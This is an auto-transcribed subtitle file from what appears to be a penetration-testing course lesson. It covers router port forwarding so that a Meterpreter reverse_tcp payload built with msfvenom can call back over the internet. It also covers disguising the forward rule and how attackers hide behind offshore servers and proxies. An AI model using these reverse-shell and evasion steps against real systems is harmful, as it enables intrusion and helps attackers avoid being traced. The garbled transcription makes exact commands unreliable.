1
00:00:00,390 --> 00:00:03,070
Welcome to part seven of this module.

2
00:00:03,150 --> 00:00:05,820
It's time to talk about port forwarding.

3
00:00:05,820 --> 00:00:11,670
Up until now all of these demonstrations have been assuming that you are conducting your activities

4
00:00:11,670 --> 00:00:16,710
with met split on the same network as your target or targets.

5
00:00:16,710 --> 00:00:22,020
I can imagine this may have been frustrating to some of you who might be thinking this whole technique

6
00:00:22,020 --> 00:00:25,470
is useless as a form of remote penetration testing.

7
00:00:25,470 --> 00:00:27,000
But fear not.

8
00:00:27,000 --> 00:00:33,840
All we really need to do is set up port forwarding on our router once this is done we'll be able to

9
00:00:33,840 --> 00:00:41,100
setup our payloads using our real IP address instead of our network IP when the payload sends a signal

10
00:00:41,100 --> 00:00:48,300
to our IP and the port that we specify a router is going to forward that connection directly to the

11
00:00:48,300 --> 00:00:53,280
computer that we're running met a split on depending on your background.

12
00:00:53,310 --> 00:00:58,410
What I just said might seem very cut and dry or terribly confusing.

13
00:00:58,410 --> 00:01:02,460
So for the benefit of the less experienced I will elaborate.

14
00:01:02,460 --> 00:01:09,350
Until now we've been using network IP addresses in everything that we've been doing in the videos.

15
00:01:09,350 --> 00:01:20,450
This has looked like 10 0 0 dot 3 or 10 0 0 0 about 20 or whatever your own network eyepiece might look

16
00:01:20,450 --> 00:01:21,520
like this.

17
00:01:21,860 --> 00:01:28,240
Or perhaps they look like one ninety two 0 0 dot 8 or something of that nature.

18
00:01:28,610 --> 00:01:34,770
Regardless of how your network configuration is set up these are local addresses.

19
00:01:34,820 --> 00:01:42,020
If you were not connected to the same router the address tend 0.01 3 would have a completely different

20
00:01:42,020 --> 00:01:48,470
meaning you would not be able for example to hack into a computer on your home network.

21
00:01:48,470 --> 00:01:55,760
If you are connected to your office network you need to use the public IP address that corresponds to

22
00:01:55,760 --> 00:01:56,750
your router.

23
00:01:56,750 --> 00:01:59,750
If you want things to perform over the Internet.

24
00:01:59,810 --> 00:02:02,780
This is where port forwarding comes into play.

25
00:02:02,780 --> 00:02:14,810
Let's say that our public IP address is 72 dot 126 dot 7 dot 186 and our network address is going to

26
00:02:14,810 --> 00:02:17,900
be 10 dot 0 0 dot 6.

27
00:02:17,900 --> 00:02:19,200
This is just an example.

28
00:02:19,250 --> 00:02:25,850
If we want our payload to open up a mature operator session across the Internet say again from our home

29
00:02:25,850 --> 00:02:34,430
computer to our office computer or vice versa we need to give the payload the IP address 72 dot 126

30
00:02:34,790 --> 00:02:40,280
dot 7 dot 186 which in this example is our public IP.

31
00:02:40,400 --> 00:02:47,300
Then the payload is going to try to connect to our router using whatever port we specified when we set

32
00:02:47,300 --> 00:02:56,370
up the payload which in our previous example was I believe 444 without port forwarding being set up

33
00:02:56,490 --> 00:03:03,150
our router is just going to look at that request for a connection and go nope it will reject it or more

34
00:03:03,150 --> 00:03:05,530
accurately it just won't go anywhere.

35
00:03:05,610 --> 00:03:13,230
All we have to do is go into our router settings and tell our router to send any connections coming

36
00:03:13,230 --> 00:03:23,580
in on Port 444 to our met a split computer which again in this example is going to be tender 0 0 6.

37
00:03:23,610 --> 00:03:27,800
Unfortunately every single router out there is different.

38
00:03:27,800 --> 00:03:34,200
The technique for doing this is going to be similar but obviously I can't show this process for every

39
00:03:34,200 --> 00:03:36,310
different router brand in existence.

40
00:03:36,330 --> 00:03:42,450
You may have to do a little research on your own and look up the router brand for specific instructions

41
00:03:42,510 --> 00:03:49,260
if you aren't able to readily spot the port forwarding tab in your advanced settings because it is an

42
00:03:49,260 --> 00:03:51,190
extremely common router.

43
00:03:51,240 --> 00:03:56,910
I'm going to be using a Comcast X affinity gateway for this demonstration.

44
00:03:56,970 --> 00:04:03,480
This is the combination modem Wi-Fi router that most customers leased from Comcast as part of their

45
00:04:03,480 --> 00:04:04,900
internet package.

46
00:04:04,920 --> 00:04:10,560
Please understand that I am not endorsing this router choice or this service I chose it because it is

47
00:04:10,560 --> 00:04:15,720
highly common in my area of the world and should make for a suitable demonstration.

48
00:04:15,750 --> 00:04:22,290
So we're going to open up our browser of choice and we need to navigate to our router using our network

49
00:04:22,320 --> 00:04:24,740
IP address of the router.

50
00:04:24,840 --> 00:04:33,120
In this case that's going to be h TTP colon forward slash forward slash 10 0 0 adult 1 and this should

51
00:04:33,120 --> 00:04:35,920
bring us to the router log in page.

52
00:04:36,030 --> 00:04:39,100
Now again yours might be slightly different.

53
00:04:39,180 --> 00:04:47,700
For example it might be one 92 dot 0 0 dot one please look up the individual router brand and look up

54
00:04:47,700 --> 00:04:49,320
instructions on how to log in.

55
00:04:49,320 --> 00:04:52,760
If you have any problems it shouldn't be too difficult.

56
00:04:52,830 --> 00:04:58,380
At any rate once you put in the routers IP address you should be presented with a page that looks something

57
00:04:58,380 --> 00:04:59,520
like this.

58
00:04:59,520 --> 00:05:06,240
These are required log in credentials to access your router if you've changed these you'll need to supply

59
00:05:06,240 --> 00:05:09,500
whatever user name and password that you set.

60
00:05:09,540 --> 00:05:15,240
If you did not change them then they should be the default and the default is going to vary from router

61
00:05:15,240 --> 00:05:16,800
to router.

62
00:05:16,890 --> 00:05:25,680
In this case it's going to be admin for the user name and password all lowercase for a password.

63
00:05:25,680 --> 00:05:32,250
Some writers have admin ad men or something like that again finding the default log in for your router

64
00:05:32,250 --> 00:05:35,300
branch should be as easy as a single Internet search.

65
00:05:36,150 --> 00:05:42,330
But if you set the password and now you can't remember that password you may need to perform a router

66
00:05:42,330 --> 00:05:47,110
reset but doing so is outside of the scope of this particular tutorial.

67
00:05:47,130 --> 00:05:50,820
Once logged into the gateway we can now adjust the settings.

68
00:05:51,030 --> 00:05:57,450
So the first thing that we need to do is click on this advanced tab and click on port forwarding and

69
00:05:57,450 --> 00:06:03,690
then we need to make sure that port forwarding is enabled and that this button appears in green.

70
00:06:03,780 --> 00:06:10,050
If the disabled button appears in a red and enabled IS NOT GREEN We need to press the enabled button

71
00:06:10,560 --> 00:06:18,000
to allow port forwarding once we're very sure that port forwarding is enabled we can come over here

72
00:06:18,000 --> 00:06:21,360
to the add services button and click on it.

73
00:06:21,360 --> 00:06:27,900
After doing that we're going to be brought to a page that looks like this again the exact appearance

74
00:06:27,960 --> 00:06:33,390
and layout will vary from router to router but it shouldn't be wildly different.

75
00:06:33,480 --> 00:06:39,750
Now I want to point out that we're going to have the option to specify what service we want to set up

76
00:06:39,870 --> 00:06:42,900
in this first dragged down menu.

77
00:06:42,920 --> 00:06:48,830
This is good to know of course but for our purposes right now we will be just fine leaving the selection

78
00:06:48,860 --> 00:06:50,870
as other under the service name.

79
00:06:50,870 --> 00:06:54,550
You can call it whatever you want in this demonstration.

80
00:06:54,560 --> 00:07:02,570
I'll be using met a split but if you were setting this up on an office router or something as part of

81
00:07:02,570 --> 00:07:07,960
a penetration test you'd probably want to give it a more legitimate sounding name.

82
00:07:08,030 --> 00:07:11,420
A good system administrator is going to spot it regardless.

83
00:07:11,600 --> 00:07:16,700
As any ad been worth their salt should know exactly which port forwarding exceptions exist on their

84
00:07:16,700 --> 00:07:23,810
own network but unless security is tight it's not likely to be checked all that often so it may evade

85
00:07:23,810 --> 00:07:26,720
notice for a little while for the service type.

86
00:07:26,720 --> 00:07:37,010
We have the option of both TGP and UDP TGP or UDP again for our purposes we'll just set it to both TPP

87
00:07:37,010 --> 00:07:37,980
and UDP.

88
00:07:38,000 --> 00:07:41,210
Now this next step is actually the most important.

89
00:07:41,600 --> 00:07:46,790
We need to specify the network address of our met a split machine.

90
00:07:46,790 --> 00:07:58,460
If you don't know what this is just type i f config in this case it's going to be 10 down 0 0 6 yours

91
00:07:58,460 --> 00:08:03,590
will vary if you're on a Windows P.C. the command would be IP config by the way.

92
00:08:04,040 --> 00:08:13,010
And if all else fails you can always go over to the connected devices on your router and sport VPC that

93
00:08:13,010 --> 00:08:15,590
you want to use and get the IP that way.

94
00:08:15,590 --> 00:08:22,550
So what this does is it tells the router that any incoming connections on the specified ports are going

95
00:08:22,550 --> 00:08:28,500
to be forwarded directly to or met a split machine at that specific network address.

96
00:08:28,550 --> 00:08:33,860
If we do this wrong the incoming connections simply won't reach where we want them to go.

97
00:08:33,860 --> 00:08:41,360
Finally we have the option to specify a range of ports that we wish forwarded we could for example type

98
00:08:41,370 --> 00:08:47,200
4000 as the starting port and 5000 as the end port.

99
00:08:47,210 --> 00:08:55,130
This would mean that any connection using ports 4000 to 5000 or anything in between would be forwarded.

100
00:08:55,130 --> 00:09:05,580
We can also specify a specific port in this case 4 4 4 by filling that into both the boxes assuming

101
00:09:05,580 --> 00:09:09,990
of course that that's the port we're choosing to use for a metal split payloads.

102
00:09:09,990 --> 00:09:17,370
Now I should add that some router brands particularly older brands will require you to set each individual

103
00:09:17,370 --> 00:09:17,910
port.

104
00:09:17,910 --> 00:09:19,320
Exception.

105
00:09:19,320 --> 00:09:23,630
One at a time you may not have a start port and an end port option.

106
00:09:23,700 --> 00:09:29,620
Once done click the Add button and you should see your newly created exception in the list.

107
00:09:29,630 --> 00:09:36,420
Now will flip back to MSF console and we'll go ahead and create a payload using MSF venom exactly as

108
00:09:36,420 --> 00:09:39,900
we did before to create image turpitude reversed.

109
00:09:39,900 --> 00:09:43,230
CCP session with the target that we wish to hack.

110
00:09:43,260 --> 00:09:50,430
The procedure is exactly the same except that instead of supplying our network IP we will be supplying

111
00:09:50,460 --> 00:09:52,000
our public IP.

112
00:09:52,050 --> 00:09:56,460
The command structure should look pretty familiar by now but all walk us through it.

113
00:09:56,490 --> 00:10:09,330
MSF venom TAC P windows forward slash the trooper forward slash reverse DCP El host equals our public

114
00:10:09,330 --> 00:10:29,550
IP address 73 dot 15 dot sixty nine dot 169 and our El port is going to remain for 44 TAC F B XY greater

115
00:10:29,550 --> 00:10:37,170
than forward slash route forward slash desktop you can of course create this wherever you wish and I'm

116
00:10:37,170 --> 00:10:45,630
going to call this forwarded e XY and this will generate the new payload which I've named forward EMC

117
00:10:45,630 --> 00:10:50,590
for this demonstration and place it on our desktop again you've seen this all before.

118
00:10:50,670 --> 00:10:58,680
The only difference in this step is that for the El host instead of using ten dot 0 0 at 6 we used our

119
00:10:58,710 --> 00:11:03,810
public IP address which has created our new payload here on the desktop.

120
00:11:03,840 --> 00:11:11,040
So once we've done that we need to setup our exploit settings so we're gonna do use forward slash multi

121
00:11:11,040 --> 00:11:16,940
forward slash handler and there's going to be a slight difference in this process.

122
00:11:17,100 --> 00:11:22,830
Again we're going to set the El host to our public IP

123
00:11:27,350 --> 00:11:31,140
whoops as opposed to our network IP.

124
00:11:31,190 --> 00:11:33,370
I think El host has to be capitalized

125
00:11:35,930 --> 00:11:38,920
and we'll set the L port keep it the same.

126
00:11:38,920 --> 00:11:41,080
You can set it to whatever you wish.

127
00:11:41,300 --> 00:11:42,580
Show Options.

128
00:11:42,710 --> 00:11:46,160
Very good and then we would type exploit.

129
00:11:46,340 --> 00:11:50,180
And then once the payload is run the session will open as normal.

130
00:11:50,330 --> 00:11:54,180
Even if the target is on a different network a thousand miles away.

131
00:11:54,200 --> 00:11:54,810
OK.

132
00:11:54,890 --> 00:12:04,040
So why is this a really bad idea well the payload is going to send a connection directly to the public

133
00:12:04,070 --> 00:12:06,580
IP address that you give it.

134
00:12:06,590 --> 00:12:13,790
This means that a network administrator or even the person using the infected computer could potentially

135
00:12:13,790 --> 00:12:18,550
detect the open connection and trace it directly to you.

136
00:12:18,650 --> 00:12:25,580
Your Internet service provider sees and logs all unencrypted traffic going to and from your computer.

137
00:12:25,580 --> 00:12:33,800
This means that if you use your home IP address the connection can be traced right back to you and your

138
00:12:33,800 --> 00:12:40,490
ISP will have a log of everything tid is that it can provide to the authorities even for someone who

139
00:12:40,490 --> 00:12:46,470
is doing a lawful penetration test and has written permission to show the authorities they've they've

140
00:12:46,490 --> 00:12:49,110
dotted every i and cross every T.

141
00:12:49,130 --> 00:12:51,180
This can still be quite a headache.

142
00:12:51,440 --> 00:12:56,010
Black hat hackers therefore do not use their own home IP address.

143
00:12:56,300 --> 00:13:02,600
They perform their hacking activities from coffee shops or hacked networks that they have no personal

144
00:13:02,600 --> 00:13:03,920
connection to.

145
00:13:03,980 --> 00:13:08,030
That doesn't relate to their identity or more commonly through proxies.

146
00:13:08,030 --> 00:13:15,740
A common technique for a hacker would be to purchase a small virtual private server in a foreign country

147
00:13:16,090 --> 00:13:22,670
so-called bullet proof hosting our servers in countries outside of the hacker's jurisdiction that are

148
00:13:22,670 --> 00:13:27,480
unlikely to cooperate with the demands of the hackers home country.

149
00:13:27,590 --> 00:13:34,340
For example a hacker in the United States might purchase a virtual private server in Russia with the

150
00:13:34,340 --> 00:13:40,250
idea that the Russian government is unlikely to force the company to hand over any records to the United

151
00:13:40,250 --> 00:13:41,080
States government.

152
00:13:41,090 --> 00:13:47,870
Given the relationship between the two nation states in any case the hacker would make their connection

153
00:13:47,870 --> 00:13:55,460
to the service through the use of a virtual private network or Tor or a proxy chain or something like

154
00:13:55,460 --> 00:13:55,910
that.

155
00:13:55,970 --> 00:13:59,800
All of which we will be covering in an upcoming module.

156
00:14:00,050 --> 00:14:07,970
They would pay using some anonymous method possibly Bitcoin or another crypto currency which many of

157
00:14:07,970 --> 00:14:13,820
these services actually facilitate and encourage once the private server is up and running.

158
00:14:13,820 --> 00:14:20,540
The hacker then uses it as a proxy connecting to it from an encrypted connection such as a VPN as has

159
00:14:20,540 --> 00:14:25,690
been said Metis Floyd is run on the server rather than the home computer.

160
00:14:25,790 --> 00:14:30,330
So any attempt to trace the IP would lead to the virtual private server.

161
00:14:30,440 --> 00:14:32,660
In this case the proxy.

162
00:14:32,660 --> 00:14:37,110
This is but one method that hackers use to cover their tracks.

163
00:14:37,280 --> 00:14:42,500
All of this will be discussed at greater length soon and the subject of virtual private servers will

164
00:14:42,500 --> 00:14:45,370
be elaborated on more when we get to bot nets.

165
00:14:45,380 --> 00:14:51,230
For now just keep it in the back of your mind that using our home IP address even for lawful activities

166
00:14:51,620 --> 00:14:58,430
is really a very bad idea and is likely to cause you many headaches as always be lawful.

167
00:14:58,460 --> 00:15:04,550
Never use anything shown in this video or any other video against any target that you do not have written

168
00:15:04,550 --> 00:15:07,650
permission from the owner to penetration test.

169
00:15:07,850 --> 00:15:12,830
Be aware of the laws of your area and your country and follow them at all times.

170
00:15:12,830 --> 00:15:18,210
Next we'll look at some additional payload types before moving on to Armitage.

171
00:15:18,350 --> 00:15:20,620
Thank you and I'll see you next time.